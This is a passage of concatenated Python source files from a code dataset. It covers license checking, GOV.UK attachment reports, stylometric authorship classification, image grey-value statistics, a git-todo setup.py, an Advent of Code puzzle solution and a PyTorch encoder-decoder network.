These licenses are registered, but not found in dependency reports.\".format(len(unchecked_licenses)))\n        print_log_to_stderr(\"These licenses must be checked manually.\")\n        for unchecked_license in unchecked_licenses:\n            print_log_to_stderr(\"groupId: {}, artifactId: {}, version: {}, reported_license: {}\".format(unchecked_license[0], unchecked_license[1], unchecked_license[2], unchecked_license[3]))\n        print_log_to_stderr(\"\")\n\n    if len(mismatched_licenses) > 0 or len(missing_licenses) > 0:\n        sys.exit(1)\n\n\nif __name__ == \"__main__\":\n    try:\n        parser = argparse.ArgumentParser(description='Check and generate license file.')\n        parser.add_argument('license_yaml', type=str)\n        parser.add_argument('dependency_reports_root', type=str)\n        args = parser.parse_args()\n\n        license_yaml = args.license_yaml\n        dependency_reports_root = args.dependency_reports_root\n        check_licenses(license_yaml, dependency_reports_root)\n\n    except KeyboardInterrupt:\n        print('Interrupted, closing.')\n","sub_path":"distribution/bin/check-licenses.py","file_name":"check-licenses.py","file_ext":"py","file_size_in_byte":20697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"98549243","text":"from src.report_generators.base_report_generator import BaseReportGenerator\nfrom src.helpers.preprocess_text import extract_subtext, extract_from_path\nfrom src.utils.constants import ATTACHMENTS\n\nfrom bs4 import BeautifulSoup\nfrom collections import Counter\n\n\nclass AttachmentTypeReportGenerator(BaseReportGenerator):\n    @property\n    def headers(self):\n        return [\"base_path\",\n                \"primary_publishing_organisation\",\n                \"publishing_app\",\n                \"document_type\",\n                \"first_published_at\",\n                \"attachment_and_count\"]\n\n    @property\n    def filename(self):\n        return \"attachment_type_report.csv\"\n\n    def process_page(self, content_item, html):\n        # ignore empty details\n        if not content_item['details']:\n            return []\n\n        # extract primary publishing organisations\n        content_item['primary_publishing_organisation'] = extract_subtext(text=content_item['organisations'],\n                                                                          key='primary_publishing_organisation',\n                                                                          index=1)\n        # extract attachment url\n        content_item['attachment_and_count'] = self.count_attachment_from_html(text=content_item['details'])\n\n        # return only pages with valid attachment extensions\n        if not content_item['attachment_and_count']:\n            return []\n        else:\n            return [content_item['base_path'],\n                    content_item['primary_publishing_organisation'],\n                    content_item['publishing_app'],\n                    content_item['document_type'],\n                    content_item['first_published_at'],\n                    content_item['attachment_and_count']]\n\n    @staticmethod\n    def count_attachment_from_html(text: str) -> dict:\n        \"\"\"\n        Extracts attachments as identified by links from a GOV.UK webpage by looking at href tags.\n        Very similar to extract_links_from_html() but returns more results.\n        Example: government/publications/measles-mumps-and-rubella-lab-confirmed-cases-in-england-2019\n        Reference:\n        - `src/helpers/preprocess_text.py`\n\n        :param text: String of the HTML code to extract attachments from.\n        :return: Dictionary of count of attachment extensions.\n        \"\"\"\n        try:\n            soup = BeautifulSoup(text, 'html5lib')\n            links = [link.get('href') for link in soup.find_all(name='a', href=True)]\n            # extract extension\n            attachments = extract_from_path(data=links, part='ext')\n            # take valid attachments only\n            attachments = [x for x in attachments if x in ATTACHMENTS]\n            # take unique html attachments\n            attachments_html = [html for 
html in links if html.startswith('/')]\n            attachments_html = list(set(attachments_html))\n            # count repeated attachment elements in list\n            attachment_counts = dict(Counter(attachments))\n            # add html counts\n            html_count = len(attachments_html)\n            # cast 0s to None to be consistent with other attachments\n            if html_count == 0:\n                html_count = None\n\n            attachment_counts.update({'.html': html_count})\n\n            return attachment_counts\n\n        except Exception as e:\n            print(\"error @count_attachment_from_html\", e)\n","sub_path":"src/report_generators/attachment_type_report_generator.py","file_name":"attachment_type_report_generator.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"585383989","text":"from ..constants import dbengine, outputdir\nfrom ..log_setup import setup_logging\nfrom .compute_features import count_dicts_to_sparse, count_char_ngrams, spacy_parse_docs\nfrom .ngram import NGramCounter\nfrom MulticoreTSNE import MulticoreTSNE as TSNE\nfrom scipy.sparse import csr_matrix\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.decomposition import PCA\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report, accuracy_score, f1_score, confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nimport argparse\nimport logging\nimport numpy as np\nimport os\nimport pandas as pd\nimport pickle\nimport scipy.sparse\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nlogger = setup_logging(__name__, mode='a', level=logging.DEBUG)\n\ndef visualize_tsne(embedding, authors):\n    # TODO d3.js vis where you can pick authors to highlight\n    # unpicked authors are gray dots\n    authors = np.array(authors)\n    u_authors = np.sort(np.unique(authors))\n    author_inds = []\n    for a in u_authors:\n        author_inds.append(np.argwhere(authors == a))\n\n    markers = ['o', '^', 's', 'x', '*'] * 2\n    colors = sns.hls_palette(10, l=.6, s=.5)\n\n    for inds, author, marker, color in zip(author_inds, u_authors, markers, colors):\n        sample = np.random.choice(inds.flatten(), min(len(inds), 2000), replace=False)\n        plt.scatter(embedding[sample, 0],\n                    embedding[sample, 1],\n                    label=author,\n                    marker=marker,\n                    color=color,\n                    alpha=.3)\n\n    plt.gca().set_xticks([])\n    plt.gca().set_yticks([])\n    plt.legend()\n    return plt.gcf()\n\ndef compare_authors(x1, x2, set1_inds, set2_inds, set3_inds, set1_label, set2_label, set3_label):\n    \"\"\"Takes three sets of documents + three author names and displays a scatter\n    plot of avg word length vs avg sentence length\n\n    \"\"\"\n    sample1 = np.random.choice(set1_inds, 2000, replace=False)\n    sample2 = np.random.choice(set2_inds, 2000, replace=False)\n    sample3 = np.random.choice(set3_inds, 2000, replace=False)\n\n    plt.plot(x1[sample1], x2[sample1], marker='.', markersize=15, linestyle='none', color='b', alpha=.1, label=set1_label)\n    plt.plot(x1[sample2], x2[sample2], marker='.', markersize=15, linestyle='none', color='g', alpha=.1, label=set2_label)\n    plt.plot(x1[sample3], x2[sample3], marker='.', markersize=15, linestyle='none', color='#990000', alpha=.1, label=set3_label)\n    plt.legend()\n    plt.gca().set_xlabel('Average sentence length')\n    plt.gca().set_ylabel('Average word length')\n    return plt.gcf()\n\nclass FeatureAnalysis():\n    def __init__(self,\n                 input_table='chunks',\n                 
word_n_highest=200,\n                 unigram_n_highest=100,\n                 trigram_n_highest=100,\n                 pentagram_n_highest=200,\n                 feature_file=None,\n                 colnames_file=None):\n\n        self.input_table = input_table\n        self.word_n_highest = word_n_highest\n        self.unigram_n_highest = unigram_n_highest\n        self.trigram_n_highest = trigram_n_highest\n        self.pentagram_n_highest = pentagram_n_highest\n\n        # Cache\n        self.reset_cache()\n\n        logger.info('Beginning new analysis with following params:')\n        logger.info('input_table = {}'.format(self.input_table))\n        logger.info('word_n_highest = {}'.format(self.word_n_highest))\n        logger.info('unigram_n_highest = {}'.format(self.unigram_n_highest))\n        logger.info('trigram_n_highest = {}'.format(self.trigram_n_highest))\n        logger.info('pentagram_n_highest = {}'.format(self.pentagram_n_highest))\n\n        if feature_file:\n            logger.info('loading features from disk')\n            self.get_features(feature_file=feature_file, colnames_file=colnames_file)\n\n    def reset_cache(self):\n        self.feature_matrix = None\n        self.colnames = None\n        self.docs = None\n\n    def load_count_matrix(self, table_name):\n        \"\"\" Load word counts from database\n\n        Parameters\n        ----------\n        table_name : str\n            name of the count table\n\n        Returns\n        -------\n        lut : dict\n            Mapping from matrix column indices to symbols\n        counts : scipy.sparse.csr_matrix\n            Count matrix\n        \"\"\"\n        lut = dict([(x.col, x.symbol) for x in pd.read_sql_table(table_name + '_lut', dbengine).itertuples()])\n        counts = pd.read_sql_table(table_name, dbengine, index_col='index').sort_index()\n        counts = scipy.sparse.vstack(pickle.loads(x) for x in counts.symbol_counts)\n        return lut, counts\n\n    def select_top_counts(self, lut, counts, n_highest, colnames_dict=None):\n        \"\"\" Select top ranking counts\n\n        Parameters\n        ----------\n        lut : list\n            List of symbols which determines the order of\n            columns in the output matrix\n        counts : scipy.sparse.csr_matrix\n            Count matrix\n        n_highest : int\n            how many to keep\n        colnames_dict: dict\n            Mapping from colnames -> inds in final feature matrix.\n            Used to match previously computed feature columns to new\n            ones.\n\n        Returns\n        -------\n        symbols : list of str\n            list of symbols in new reduced matrix\n        counts : scipy.sparse.csr_matrix\n            matrix containing only the top ranked columns\n        \"\"\"\n        if colnames_dict:\n            inds = [n for n, x in enumerate(lut) if x in colnames_dict]\n        else:\n            inds = np.argsort(np.asarray(counts.sum(axis=0)).flatten())[-n_highest:]\n\n        symbols = [lut[i] for i in inds]\n        counts = counts[:, inds]\n        return symbols, counts\n\n    def get_features(self, feature_file=None, colnames_file=None):\n        if self.feature_matrix is None:\n            def get_subtable(name):\n                return self.input_table + '_' + name\n\n            logger.debug('loading documents')\n            docs = pd.read_sql_table(self.input_table, dbengine, index_col='index').sort_index()\n            self.docs = docs\n\n            if feature_file:\n                self.feature_matrix = pickle.load(open(feature_file, 'rb'))\n                self.colnames = pickle.load(open(colnames_file, 'rb'))\n            else:\n                logger.debug('loading numeric features')\n                features = pd.read_sql_table(get_subtable('features'), dbengine, index_col='index').sort_index().drop('length', axis=1)\n                feature_names = list(features.columns)\n                features = csr_matrix(features)\n\n                logger.debug('loading word counts')\n                words, word_count = self.select_top_counts(*self.load_count_matrix(get_subtable('word_count')), self.word_n_highest)\n                logger.debug('loading unigram counts')\n                unigrams, unigram_count = self.select_top_counts(*self.load_count_matrix(get_subtable('1gram_count')), 
self.unigram_n_highest)\n logger.debug('loading trigram counts')\n trigrams, trigram_count = self.select_top_counts(*self.load_count_matrix(get_subtable('3gram_count')), self.trigram_n_highest)\n logger.debug('loading pentagram counts')\n pentagrams, pentagram_count = self.select_top_counts(*self.load_count_matrix(get_subtable('5gram_count')), self.pentagram_n_highest)\n\n colnames = dict(zip(range(0, len(feature_names + words + unigrams + trigrams + pentagrams)),\n feature_names + words + unigrams + trigrams + pentagrams))\n self.colnames = colnames\n\n feature_matrix = scipy.sparse.hstack((features, word_count, unigram_count, trigram_count, pentagram_count)).tocsr()\n self.feature_matrix = feature_matrix\n\n return self.feature_matrix, self.colnames, self.docs\n\n def compute_new_features(self, new_docs, nlp, old_lut, colnames_dict):\n \"\"\"Takes new documents and returns feature matrix and column names. Uses `nlp`\n and `colnames_dict` arguments to ensure that the word count and ngram counts are\n calculated using the same underlying set of words/ngrams\n\n Parameters\n ----------\n new_docs : pandas.DataFrame\n New documents/chunks to compute features for\n nlp : spacy.en.English\n spacy model whose nlp.vocab.strings attribute matches\n colnames_dict['word'] contents\n old_lut : dict of set\n dict with fields ['word', 'unigram', 'trigram', 'pentagram'],\n containing sets of words/ngrams in previously computed feature\n set\n colnames_dict : dict of dict\n dict with fields ['feature', 'word', 'unigram', 'trigram',\n 'pentagram'], whose corresponding values are dict-like objects\n mapping symbols to indices in order to make the new column names\n match the old ones\n\n Returns\n -------\n new_feature_matrix : scipy.sparse.csr_matrix\n new_colnames : list of str\n\n \"\"\"\n def reorder_columns(matrix, colnames, inds):\n # take matrix, column names, and dict of colnames -> inds\n # and rearrange the columns\n start = min(inds.values())\n target_cols = [inds[x] - start for x in colnames]\n sort_order = [x[0] for x in sorted(enumerate(target_cols), key=lambda x: x[1])]\n new_colnames = [colnames[i] for i in sort_order]\n new_matrix = matrix[:, sort_order]\n return new_matrix, new_colnames\n\n print('\\nGet numerical features and word counts\\n')\n features, feature_names = spacy_parse_docs(nlp, new_docs)\n\n word_counters = [NGramCounter(counts=wc) for wc in features.word_count]\n word_counters[0].reconcile(old_lut['word'])\n mat, hashes = count_dicts_to_sparse(features.word_count)\n names = [nlp.vocab.strings[int(h)] for h in hashes]\n words, word_count = self.select_top_counts(names, mat, self.word_n_highest, colnames_dict['word'])\n word_count, words = reorder_columns(word_count, words, colnames_dict['word'])\n\n # Drop extraneous/unused columns\n features = features.drop(['word_count', 'length'], axis=1)\n feature_names = list(features.columns)\n features = csr_matrix(features)\n\n # Reorder feature columns\n features, feature_names = reorder_columns(features, feature_names, colnames_dict['feature'])\n\n print('\\nCount character 1grams\\n')\n unigram_counters = count_char_ngrams(new_docs, 1)\n unigram_counters[0].reconcile(old_lut['unigram'])\n mat, names = count_dicts_to_sparse([x.counts for x in unigram_counters])\n unigrams, unigram_count = self.select_top_counts(names, mat, self.unigram_n_highest, colnames_dict['unigram'])\n unigram_count, unigrams = reorder_columns(unigram_count, unigrams, colnames_dict['unigram'])\n\n print('\\nCount character 3grams\\n')\n trigram_counters = 
count_char_ngrams(new_docs, 3)\n trigram_counters[0].reconcile(old_lut['trigram'])\n mat, names = count_dicts_to_sparse([x.counts for x in trigram_counters])\n trigrams, trigram_count = self.select_top_counts(names, mat, self.trigram_n_highest, colnames_dict['trigram'])\n trigram_count, trigrams = reorder_columns(trigram_count, trigrams, colnames_dict['trigram'])\n\n print('\\nCount character 5grams\\n')\n pentagram_counters = count_char_ngrams(new_docs, 5)\n pentagram_counters[0].reconcile(old_lut['pentagram'])\n mat, names = count_dicts_to_sparse([x.counts for x in pentagram_counters])\n pentagrams, pentagram_count = self.select_top_counts(names, mat, self.pentagram_n_highest, colnames_dict['pentagram'])\n pentagram_count, pentagrams = reorder_columns(pentagram_count, pentagrams, colnames_dict['pentagram'])\n print('\\ndone\\n')\n\n new_colnames = dict(zip(range(0, len(feature_names + words + unigrams + trigrams + pentagrams)),\n feature_names + words + unigrams + trigrams + pentagrams))\n new_feature_matrix = scipy.sparse.hstack((features, word_count, unigram_count, trigram_count, pentagram_count)).tocsr()\n\n return new_feature_matrix, new_colnames\n\ndef run_logistic_regression(features, docs, shuffle_labels=False, pca_dims=None):\n encoder = LabelEncoder()\n labels = encoder.fit_transform(docs.author)\n if shuffle_labels:\n np.random.shuffle(labels)\n\n if pca_dims:\n pca = PCA(n_components=pca_dims)\n features = pca.fit_transform(features)\n\n X_train, X_test, y_train, y_test = train_test_split(features,\n labels,\n test_size=.2,\n random_state=9,\n stratify=labels)\n\n logger.debug('fitting logistic regression')\n lr = LogisticRegression(C=1,\n multi_class='multinomial',\n solver='lbfgs',\n max_iter=1000,\n verbose=1,\n random_state=9)\n\n lr.fit(X_train, y_train)\n y_pred = lr.predict(X_test)\n\n cm = confusion_matrix(y_test, y_pred)\n acc = accuracy_score(y_test, y_pred)\n f1 = f1_score(y_test, y_pred, average='micro')\n\n logger.info('\\n' + classification_report(y_test,\n y_pred,\n labels=np.unique(labels),\n target_names=encoder.inverse_transform(np.unique(labels))))\n logger.info('Accuracy: {}'.format(acc))\n logger.info('F1: {}'.format(f1))\n logger.info('Confusion matrix:\\n{}'.format(cm))\n\n return lr, acc, f1, cm\n\ndef run_lda(features, docs, shuffle_labels=False):\n encoder = LabelEncoder()\n labels = encoder.fit_transform(docs.author)\n if shuffle_labels:\n np.random.shuffle(labels)\n\n X_train, X_test, y_train, y_test = train_test_split(features,\n labels,\n test_size=.2,\n random_state=9,\n stratify=labels)\n\n logger.debug('fitting linear discriminant analysis')\n lda = LinearDiscriminantAnalysis()\n\n lda.fit(X_train, y_train)\n y_pred = lda.predict(X_test)\n\n cm = confusion_matrix(y_test, y_pred)\n acc = accuracy_score(y_test, y_pred)\n f1 = f1_score(y_test, y_pred, average='micro')\n\n logger.info('\\n' + classification_report(y_test,\n y_pred,\n labels=np.unique(labels),\n target_names=encoder.inverse_transform(np.unique(labels))))\n logger.info('Accuracy: {}'.format(acc))\n logger.info('F1: {}'.format(f1))\n logger.info('Confusion matrix:\\n{}'.format(cm))\n\n return lda, acc, f1, cm\n\ndef tsne2d(features, docs, seed, pca_first=True, *args, **kwargs):\n \"\"\"\n Parameters\n ----------\n features\n inputs in high-D feature space\n docs\n input documents\n seed : int\n seed for numpy RNG\n *args, **kwargs\n args for TSNE (see sklearn docs)\n Returns\n -------\n flat : np.array\n 2d t-sne embedding\n indices\n indices of the subset of documents used\n \"\"\"\n 
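# Seed the RNG, then shuffle and keep at most 30k documents; running t-SNE on the full corpus would be prohibitively slow.\n    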
np.random.seed(seed)\n    shuffle = np.arange(features.shape[0])\n    np.random.shuffle(shuffle)\n\n    features_subset = features[shuffle,:]\n    features_subset = features_subset[:30000,:]\n\n    docs_subset = docs.iloc[shuffle]\n    docs_subset = docs_subset.iloc[:30000]\n\n    if pca_first:\n        tsvd = TruncatedSVD(n_components=100)\n        features_r = tsvd.fit_transform(features_subset)\n    else:\n        features_r = features_subset\n\n    tsne = TSNE(*args, **kwargs)\n    flat = tsne.fit_transform(features_r)\n\n    return flat, docs_subset.index\n\ndef load_old_colnames(colnames_file, n_feature, n_word, n_unigram, n_trigram, n_pentagram):\n    colnames = pickle.load(open(colnames_file, 'rb'))\n    colnames_l = [x[1] for x in sorted(colnames.items(), key=lambda x: x[0])]\n    colnames_dict = {}\n\n    ind = 0\n    colnames_dict['feature'] = dict(zip(colnames_l[ind:ind+n_feature], range(ind,ind+n_feature)))\n    ind += n_feature\n    colnames_dict['word'] = dict(zip(colnames_l[ind:ind+n_word], range(ind,ind+n_word)))\n    ind += n_word\n    colnames_dict['unigram'] = dict(zip(colnames_l[ind:ind+n_unigram], range(ind,ind+n_unigram)))\n    ind += n_unigram\n    colnames_dict['trigram'] = dict(zip(colnames_l[ind:ind+n_trigram], range(ind,ind+n_trigram)))\n    ind += n_trigram\n    colnames_dict['pentagram'] = dict(zip(colnames_l[ind:ind+n_pentagram], range(ind,ind+n_pentagram)))\n\n    return colnames_dict\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-t', '--task', action='append')\n    args = parser.parse_args()\n    tasks = args.task\n    if not tasks:\n        tasks = ['lr', 'lda', 'tsne', 'lr_pca']\n\n    analysis = FeatureAnalysis(input_table='chunks',\n                               word_n_highest=200,\n                               unigram_n_highest=100,\n                               trigram_n_highest=100,\n                               pentagram_n_highest=200)\n\n    features, colnames, docs = analysis.get_features()\n    os.makedirs(os.path.join(outputdir, 'features'), exist_ok=True)\n    pickle.dump(features, open(os.path.join(outputdir, 'features', 'features_200-100-100-200.pkl'), 'wb'))\n    pickle.dump(colnames, open(os.path.join(outputdir, 'features', 'colnames_200-100-100-200.pkl'), 'wb'))\n    pickle.dump(docs, open(os.path.join(outputdir, 'features', 'docs.pkl'), 'wb'))\n\n    if 'lr' in tasks:\n        os.makedirs(os.path.join(outputdir, 'classifier'), exist_ok=True)\n\n        lr, acc, f1, cm = run_logistic_regression(features, docs)\n        pickle.dump(lr, open(os.path.join(outputdir, 'classifier', 'lr_model.pkl'), 'wb'))\n        pickle.dump({'acc': acc, 'f1': f1, 'cm': cm}, open(os.path.join(outputdir, 'classifier', 'lr_results.pkl'), 'wb'))\n\n        lr_s, acc_s, f1_s, cm_s = run_logistic_regression(features, docs, shuffle_labels=True)\n        pickle.dump(lr_s, open(os.path.join(outputdir, 'classifier', 'lr_shuffledlabels_model.pkl'), 'wb'))\n        pickle.dump({'acc': acc_s, 'f1': f1_s, 'cm': cm_s}, open(os.path.join(outputdir, 'classifier', 'lr_shuffledlabels_results.pkl'), 'wb'))\n\n    if 'lda' in tasks:\n        os.makedirs(os.path.join(outputdir, 'classifier'), exist_ok=True)\n\n        lda, acc, f1, cm = run_lda(features.todense(), docs)\n        pickle.dump(lda, open(os.path.join(outputdir, 'classifier', 'lda_model.pkl'), 'wb'))\n        pickle.dump({'acc': acc, 'f1': f1, 'cm': cm}, open(os.path.join(outputdir, 'classifier', 'lda_results.pkl'), 'wb'))\n\n    if 'tsne' in tasks:\n        for p in [5, 10, 30, 50, 100]:\n            flat, inds = tsne2d(features, docs, seed=9, perplexity=p, n_jobs=8, n_iter=1500)\n\n            pickle.dump(flat, open(os.path.join(outputdir, 'tsne_{}.pkl').format(p), 'wb'))\n            pickle.dump(list(docs.iloc[inds].author), open(os.path.join(outputdir, 'tsne_authors_{}.pkl').format(p), 'wb'))\n\n            fig = visualize_tsne(flat, 
list(docs.iloc[inds].author))\n            fig.savefig(os.path.join(outputdir, 'tsne_{}.png').format(p))\n            plt.close('all')\n\n    if 'lr_pca' in tasks:\n        os.makedirs(os.path.join(outputdir, 'classifier'), exist_ok=True)\n\n        for ndim in [2, 5, 9, 50, 100, 200]:\n            logger.info('running logistic regression with first {} principal components'.format(ndim))\n            lr, acc, f1, cm = run_logistic_regression(features, docs, pca_dims=ndim)\n            pickle.dump(lr, open(os.path.join(outputdir, 'classifier', 'lr_pca{}_model.pkl'.format(ndim)), 'wb'))\n            pickle.dump({'acc': acc, 'f1': f1, 'cm': cm}, open(os.path.join(outputdir, 'classifier', 'lr_pca{}_results.pkl'.format(ndim)), 'wb'))\n","sub_path":"writing_style_py/features/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":20424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"19529867","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 5 16:25:51 2018\r\n\r\n@author: Dane\r\n\"\"\"\r\n\r\n#Importing Libraries\r\nfrom PIL import Image\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n\r\n\r\n#This is a test to make sure the program runs\r\nprint(\"this is a test\")\r\n\r\n#I will start the actual program here\r\n\r\n#Functions\r\n\r\n#Average white value function\r\n#M is the matrix of greys\r\n#N is the matrix of black and white\r\ndef avg_val_white(M, N):\r\n    salts = []\r\n    for i in range(N.shape[0]):\r\n        for j in range(N.shape[1]):\r\n            if(N[i,j] == 255):\r\n                salts.append(M[i,j])\r\n    if(len(salts) > 0):\r\n        return [np.mean(salts), np.std(salts)]\r\n    else:\r\n        return\r\n    \r\n#Average black value function\r\n#M is the matrix of greys\r\n#N is the matrix of black and white\r\ndef avg_val_black(M, N):\r\n    salts = []\r\n    for i in range(N.shape[0]):\r\n        for j in range(N.shape[1]):\r\n            if(N[i,j] == 0):\r\n                salts.append(M[i,j])\r\n    if(len(salts) > 0):\r\n        return [np.mean(salts), np.std(salts)]\r\n    else:\r\n        return\r\n\r\n#File handling function\r\ndef open_pics(fileName):\r\n    pathS='C:\\\\Users\\\\Dane\\\\Documents\\\\MathResearch\\\\all\\\\train\\\\images\\\\'\r\n    pathS=pathS+fileName\r\n    pathM='C:\\\\Users\\\\Dane\\\\Documents\\\\MathResearch\\\\all\\\\train\\\\masks\\\\'\r\n    pathM=pathM+fileName\r\n    m=Image.open(pathS)\r\n    m=m.convert('L')\r\n    n=Image.open(pathM)\r\n    n=n.convert('L')\r\n    M=np.array(m.getdata()).reshape(m.size[0],m.size[1])\r\n    #M=Matrix(RR,M)\r\n    N=np.array(n.getdata()).reshape(n.size[0],n.size[1])\r\n    #N=Matrix(RR,N)\r\n    return [M,N]\r\n#file line\r\nsaltFile = os.listdir('C:\\\\Users\\\\Dane\\\\Documents\\\\MathResearch\\\\all\\\\train\\\\images\\\\')\r\n\r\n#test functions\r\n\r\npointsB = []\r\nfor f in saltFile:\r\n    temp = open_pics(f)\r\n    pointsB.append(avg_val_black(temp[0], temp[1]))\r\n\r\ndef plot_test():\r\n    plt.plot(pointsB, color = \"red\")\r\n    plt.show()\r\n\r\nprint(\"time to test\")","sub_path":"conversion1.py","file_name":"conversion1.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"12323459","text":"#!/usr/bin/env python\n#coding: utf-8\n\nimport sys\nimport codecs\nimport gitTodo\n\nfrom setuptools import setup, find_packages\nfrom setuptools.command.test import test as TestCommand\n\n\nclass PyTest(TestCommand):\n    # `$ python setup.py test' simply installs minimal requirements\n    # and runs the tests with no fancy stuff like parallel execution.\n    def finalize_options(self):\n        TestCommand.finalize_options(self)\n        
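# Minimal, hard-coded pytest invocation: a verbose run over the ./tests directory; CLI test args are not forwarded.\n        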
self.test_suite = True\n        self.test_args = [\n            '--verbose',\n            './tests'\n        ]\n\n    def run_tests(self):\n        import pytest\n        sys.exit(pytest.main(self.test_args))\n\n\ntests_require = [\"pytest\"]\n\ndef long_description():\n    \n    with codecs.open('README.md', encoding='utf8') as fp:\n        return fp.read()\n\n\nsetup(\n    name=gitTodo.__prog__,\n    version=gitTodo.__version__,\n    description=\"Git-todo manage your tasks of a local git repository.\",\n    long_description=long_description(),\n    download_url='https://github.com/alice1017/gitTodo',\n    author=gitTodo.__author__,\n    author_email=gitTodo.__author__.split()[-1],\n    license=gitTodo.__license__,\n    packages=find_packages(),\n    entry_points={\n        'console_scripts': [\n            'git-todo = gitTodo.__main__:main',\n        ],\n    },\n    #install_requires=install_requires,\n    tests_require=tests_require,\n    cmdclass={'test': PyTest},\n    classifiers=[\n        'Development Status :: 3 - Alpha',\n        'Programming Language :: Python',\n        'Programming Language :: Python :: 2',\n        'Programming Language :: Python :: 2.7',\n        #'Programming Language :: Python :: 3.3',\n        'Environment :: Console',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: MIT License',\n        'Topic :: Software Development',\n        'Topic :: Terminals',\n        'Topic :: Text Processing',\n        'Topic :: Utilities',\n    ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"320738773","text":"import csv\n\nwith open('data.csv', 'r', encoding = 'utf-8-sig') as f:\n    reader = csv.reader(f)\n    values = list(reader)\n    value = values[0][0]\n\ndef cleanse (val, l1, l2):\n    val = val.replace(l1, \"\")\n    val = val.replace(l2, \"\")\n    return val\n\ndef condense (val):\n\n    changed = True\n    newVal = ''\n    while changed == True:\n        newVal = ''\n        changed = False\n        for i in range(0, len(val), 2):\n            if i + 1 < len(val):\n\n                if ((val[i].islower() and (val[i].capitalize() == val[i+1])) or (val[i+1].islower() and (val[i+1].capitalize() == val[i]))) == True:\n                    changed = True\n                else:\n                    newVal += val[i] + val[i+1]\n            else:\n                newVal += val[i]\n\n        if changed == False:\n            newVal = newVal[0]\n            for i in range(1, len(val), 2):\n                if i + 1 < len(val):\n\n                    if ((val[i].islower() and (val[i].capitalize() == val[i+1])) or (val[i+1].islower() and (val[i+1].capitalize() == val[i]))) == True:\n                        changed = True\n                    else:\n                        newVal += val[i] + val[i+1]\n                else:\n                    newVal += val[i]\n        val = newVal\n\n    return newVal\n\nlowercaseLetters = [\n    \"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\n    \"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\n    \"v\",\"w\",\"x\",\"y\",\"z\"]\n\nuppercaseLetters = list(map(lambda x: x.capitalize(), lowercaseLetters))\n\nminimum = -1\n\nfor i in range(0, len(lowercaseLetters)):\n    print(value)\n    filteredVal = cleanse(value, lowercaseLetters[i], uppercaseLetters[i])\n    nv = condense(filteredVal)\n    if minimum == -1:\n        minimum = len(nv)\n    else: minimum = min(minimum, len(nv))\n\nprint(minimum)\n","sub_path":"advent-of-code-2018/5/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"269190913","text":"# full assembly of the sub-parts to form the complete net\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\t\t\nclass EncoderDecoder(nn.Module):\n\tdef __init__(self, n_channels, n_classes):\n\t\tsuper(EncoderDecoder, self).__init__()\n\t\tself.n_classes = 
n_classes\n\t\tself.encoder = nn.Sequential(\n\t\t\tnn.Conv2d(in_channels=n_channels, out_channels=32, kernel_size=5, stride=1, padding=2), # n_channels Y\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(32, 64, 3, 2, 1),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(64, 64, 3, 1, 1),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(64, 128, 3, 2, 1),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 1),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 1),\n\t\t\t\tnn.ReLU()\n\t\t)\n\t\tself.dilated_layer = nn.Sequential(\n\t\t\tnn.Conv2d(128, 128, 3, 1, 2, dilation=2),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 4, dilation=4),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 8, dilation=8),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 16, dilation=16),\n\t\t\t\tnn.ReLU()\n\t\t)\n\t\tself.bottle_neck = nn.Sequential(\n\t\t\tnn.Conv2d(128, 128, 3, 1, 1),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 1),\n\t\t\t\tnn.ReLU()\n\t\t)\n\t\tself.decoder = nn.Sequential(\n\t\t\tnn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),\n\t\t\t\tnn.Conv2d(128, 128, 3, 1, 1), nn.ReLU(),\n\t\t\t\tnn.Conv2d(128, 128, 3, 1, 1), nn.ReLU(),\n\t\t\tnn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),\n\t\t\t\tnn.Conv2d(128, 64, 3, 1, 1), nn.ReLU(),\n\t\t\t\tnn.Conv2d(64, 64, 3, 1, 1), nn.ReLU(),\n\t\t\tnn.Conv2d(64, self.n_classes, 3, 1, 1)\n\t\t)\n\n\n\tdef forward(self, seg):\n\t\t# bs,c,h,w = img.size()\n\t\t# x = torch.cat([img, seg], dim=1)\n\n\n\t\tx = 